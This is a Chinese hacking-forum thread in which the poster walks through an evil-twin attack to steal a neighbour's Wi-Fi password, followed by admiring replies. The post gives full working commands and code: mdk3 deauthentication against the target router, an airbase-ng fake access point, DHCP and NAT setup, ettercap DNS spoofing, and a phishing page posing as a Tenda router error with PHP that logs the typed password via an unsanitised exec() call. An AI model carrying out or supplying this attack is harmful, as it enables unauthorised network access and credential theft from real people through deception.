查看: 48622|回复: 22

无线安全之巧用社会工程学获取密码

[复制链接]
  • TA的每日心情
    擦汗
    2015-11-9 16:43
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2014-5-1 16:49:24 | 显示全部楼层 |阅读模式
              现在破解Wlan密码的方式貌似就aircrack-ng和reaver两种常规方式,但是,如果我们碰到一个路由器,不支持pin,密码跑了20G字典都没出该怎么办?也许很多人会放弃.. 但是我碰到了这种情况..  我在学校附近租房子有个信号最强的..  密码也很强.. 跑了30G字典都没出..  于是就到处找思路,就有了这篇文章...

               简要介绍一下攻击方法:在目标AP有客户端连接时,我们持续攻击对方的AP,使其一直连不上去,这时,我们伪造一个和目标AP SSID一样的开放的AP,普通人发现自己的wifi上不了,下意识的肯定会点进我们的wifi,然后我们搭建好服务器,采用DNS欺骗,将对方的所有的HTTP请求redirect到我们本地搭建的网页,网页内容大致是你的路由器出错了,请输入密码恢复之类的,这个网页就是一个form表单,我们将他填写的内容用php保存,写入我们本地文件,就这样get了...看起来很简单.. 我研究了半个多月.. 唉。。 还是太笨了.. 这个思路是我以前在网上无意中瞥到的,当时没留心...  现在到了外面就想起来了... 以下全是本人实践操作..


               攻击平台:Kali Linux
               攻击者使用硬件工具:牛掰的无线网卡一块,装有Kali Linux的电脑一台
               攻击者使用软件:1.airodump-ng 2.airbase-ng 3.lighttpd 4.udhcpd 5.ettercap 6.mdk3 7.php-cgi



    安装好所有软件后配置一下lighttpd,开启他的php支持

    [Bash shell] 纯文本查看 复制代码
    lighttpd-enable-mod fastcgi-php


                准备好我们的伪造页面

    [HTML] 纯文本查看 复制代码
    <html>
    <head>
    	<meta charset="UTF-8">
    	<title>Tenda</title>
    </head>
    <body>
    	<div align="center">
    		<font size="6"><b>路由器出错了,请输入密码5分钟后重启您的路由器以恢复。</b></font>
    	</div>
    	<br>
    	<br>
    	<br>
    	<div align="center">
    		<form action="passwd.php" method="">
                <input type="password" name="passwd" value="" />
                <input type="submit" name="" value="确认重启" />
            </form>
    	</div>
    	<br>
    	<br>
    	<br>
    	<div align="center">深圳市吉祥腾达科技有限公司 / © 2014 版权所有</div>
    </body>
    </html>


    因为这里的目标是Tenda路由器,于是我就在最后面加了一行

    效果图:

    1.jpg

    提交到passwd.php

    [PHP] 纯文本查看 复制代码
    <?php
    
    header("Content-type: text/html; charset=utf-8");
    
    $com = "touch password && echo $_GET[passwd] >> password";
    exec($com);
    
    echo "正在修复设置,请您于五分钟后手动重启路由器!";
    ?>


    这段php代码的意思就是获取字段passwd后面的值然后写入文件password


    要想写入得给这个目录写的权限,lighttpd默认使用的主页文件夹是/var/www/


    [Bash shell] 纯文本查看 复制代码
    chmod 777 /var/www/ -R



    然后来测试试试:

    [Bash shell] 纯文本查看 复制代码
    service lighttpd restart


    访问127.0.0.1看看


    2.jpg


    输入123456后点击提交


    3.jpg


    URL中已经出现了用户输入的内容,看看他是否写入的password文件内

    [Bash shell] 纯文本查看 复制代码
    cat /var/www/password


    4.jpg

    成功,一切正常,接下来是伪造AP,然后搭建DHCP服务器,让用户能正常连接WiFi

    先开启无线网卡的monitor模式,airbase-ng使用mon0这种虚拟接口貌似不行,于是开启wlan0的monitor模式,mon0用来执行mdk3的攻击,当然,别忘了伪造MAC地址

    [Bash shell] 纯文本查看 复制代码
    airmon-ng start wlan0
    ifconfig mon0 down
    ifconfig wlan0 down
    macchanger -r mon0 && macchanger -r wlan0
    iwconfig wlan0 mode monitor
    ifconfig wlan0 up
    ifconfig mon0 up



    5.jpg


    开始伪造AP


    [Bash shell] 纯文本查看 复制代码
    airbase-ng -e test -c 1 wlan0



    6.jpg



    出来了,然后是设置DHCP服务器和IP转发,不然用户无法连接


    airbase-ng运行后会出来一个接口at0


    我们将at0设置为网关,但是注意,不能与eth0在同一网段


    7.jpg


    eth0的IP地址是:192.168.18.128

    我们将at0设置为192.168.16.1,at0默认是不启用的状态,需要先up

    [Bash shell] 纯文本查看 复制代码
    ifconfig at0 up
    ifconfig at0 192.168.16.1 netmask 255.255.255.0
    route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.16.1


    前面两句代码不多说,最后面的意思是来自192.168.X.X的连接都定向到192.168.16.1去

    at0设置完了,接下来设置dhcp服务

    [Bash shell] 纯文本查看 复制代码
    vim /etc/udhcpd.conf


    里面一大堆参数,我们只需要修改

    start 192.168.16.20
    end 192.168.16.200
    interface at0
    opt route 192.168.16.1



    8.jpg


    接下来启动udhcpd

    [Bash shell] 纯文本查看 复制代码
    udhcpd -f /etc/udhcpd.conf


    完成后效果图


    9.jpg


    接下来进行ip转发

    [Bash shell] 纯文本查看 复制代码
    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A POSTROUTING --out-interface eth0 -j MASQUERADE


    注意,在运行ettercap之后 /proc/sys/net/ipv4/ip_forward的值会再度变为0,需要先启动ettercap然后在将值设为1

    开启ettercap之前先修改etter.dns

    添加A纪录,让所有的HTTP请求redirect到我们的web


    [Bash shell] 纯文本查看 复制代码
    vim /etc/ettercap/etter.dns
    *.com A 192.168.18.128
    *.cn A 192.168.18.128
    *.net A 192.168.18.128
    *.com.cn A 192.168.18.128

    这里采用了正则表达式,*是通配符,就是任何的意思,我就不多加阐述了

    然后

    [Bash shell] 纯文本查看 复制代码
    ettercap -T -q -i at0 -M arp:remote -P dns_spoof // //



    接下来开始手机目标AP信息,使目标掉线,使用airodump-ng

    [Bash shell] 纯文本查看 复制代码
    airodump-ng mon0


    获取到目标AP的MAC地址之后

    [Bash shell] 纯文本查看 复制代码
    nano attack.txt


    写入目标AP的MAC地址


    使用MDK3的解除认证攻击模式,就是让目标一直断网,连不上

    [Bash shell] 纯文本查看 复制代码
    mdk3 mon0 d -b attack.txt -s 999



    好了,接下来就等鱼儿上钩就行了,

    [Bash shell] 纯文本查看 复制代码
    cat /var/www/password



    写到后面我都快吐了..  我自己都忘了下一步该干什么..   有错误欢迎指出,帮助我更好的进步....  语言可能有点啰嗦.. 大家将就一下...  本文我是在90sec首发的,不过我觉着08sec的论坛环境氛围也很不错,特分享,如发现错误希望指出!谢谢!

    评分

    参与人数 4i币 +20 收起 理由
    godsfall + 1
    hkzxsky + 1 支持原创
    90_ + 8 感谢分享
    rqwjtyq + 10 如果能再详细一点就好了,比如需要安装哪几.

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情
    难过
    2016-8-26 14:36
  • 签到天数: 6 天

    [LV.2]偶尔看看I

    发表于 2014-5-1 17:46:10 | 显示全部楼层
    前排膜拜社工大神,为了一个WIFI密码研究那么久真是毅力帝啊

    点评

    不想过那种电脑在面前,但是没网的日子..  发表于 2014-5-1 18:14
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2016-4-26 16:21
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2014-5-1 20:52:44 | 显示全部楼层
    值得学习      前面的路还很长
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-5-1 23:08:12 | 显示全部楼层
    很不错,不过我想吐槽一句,腾达的界面有这么简陋吗?

    点评

    实战的时候可以去找对应路由器的logo,弄到上面就行了  发表于 2014-5-2 06:20
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-5-1 23:10:23 | 显示全部楼层
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2015-5-31 21:29
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2014-5-1 23:52:36 | 显示全部楼层
    嗯,很不错的思路 学习了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2016-5-28 10:00
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2014-5-2 00:23:00 | 显示全部楼层
    比抓包和跑pin高大上的方法
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-7-6 16:30
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-5-2 06:19:47 | 显示全部楼层
    如果ap隐藏了呢

    点评

    隐藏的AP用airodump-ng也能扫出来,只是SSID那一栏变为了Length :0,不要紧,我们可以一直监控它,因为无线报文发送的时候SSID是明文包含在数据包内的,一旦有数据的交互,SSID自然可以捕获  详情 回复 发表于 2014-5-2 06:23
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2015-11-9 16:43
  • 签到天数: 1 天

    [LV.1]初来乍到

     楼主| 发表于 2014-5-2 06:23:01 | 显示全部楼层
    ll520 发表于 2014-5-2 06:19
    如果ap隐藏了呢

    隐藏的AP用airodump-ng也能扫出来,只是SSID那一栏变为了Length :0,不要紧,我们可以一直监控它,因为无线报文发送的时候SSID是明文包含在数据包内的,一旦有数据的交互,SSID自然可以捕获
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-5-2 09:28:27 | 显示全部楼层
    如果能破正方教育系统,那就极好了

    点评

    这是无线.. 不是web..  发表于 2014-5-2 21:28
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-24 07:03 , Processed in 0.028258 second(s), 19 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部